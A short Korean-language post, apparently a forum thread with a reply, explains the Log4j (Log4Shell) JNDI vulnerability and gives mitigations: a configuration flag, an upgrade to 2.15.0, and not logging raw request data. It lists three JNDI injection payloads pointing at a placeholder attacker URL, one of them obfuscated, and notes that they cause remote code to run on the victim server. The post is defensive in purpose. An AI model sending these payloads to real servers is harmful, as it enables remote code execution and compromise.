https://github.com/YfryTchsGD/Log4jAttackSurface
https://www.lunasec.io/docs/blog/log4j-zero-day/#who-is-impacted
아파치에서 많이 사용하는 로깅툴입니다.
마인크래프트, 구글(google cloud), 아마존(Aws) 등의 서비스에 log4j를 사용하는 경우에는 취약점이 트리거 됩니다.
트리거는 간단합니다.
공격자가 요청에
- ${jndi:rmi://공격자URL}
- ${jndi:ldap://공격자URL}
- ${jndi:${lower:l}${lower:d}a${lower:p}://공격자URL}
과 같이 요청 시 트리거 됩니다.
조치방법은 "log4j2.formatMsgNoLookups"를 "true"로 설정하거나 Log4j 2.15.0(https://logging.apache.org/log4j/2.x/download.html) 업데이트하는 겁니다.
request header 나 body를 직접 로그 프린트하는건 지양해야 합니다
그리고 남겨주신 링크를 보면 ${jndi:ldap://공격자URL} 외 다른 공격은 확인이 되지 않는데 모두 유효한 공격인지요?
성공하면 공격자가 요청한 url의 코드가 피해자 서버에서 동작됩니다. 이를 통해 명령어를 해당 코드에 넣어놓는 것으로 서버에서 해당 명령어를 실행할 수 있습니다.
오해의 소지가 있으니 본문 내용은 수정해놔야겠네요.
https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot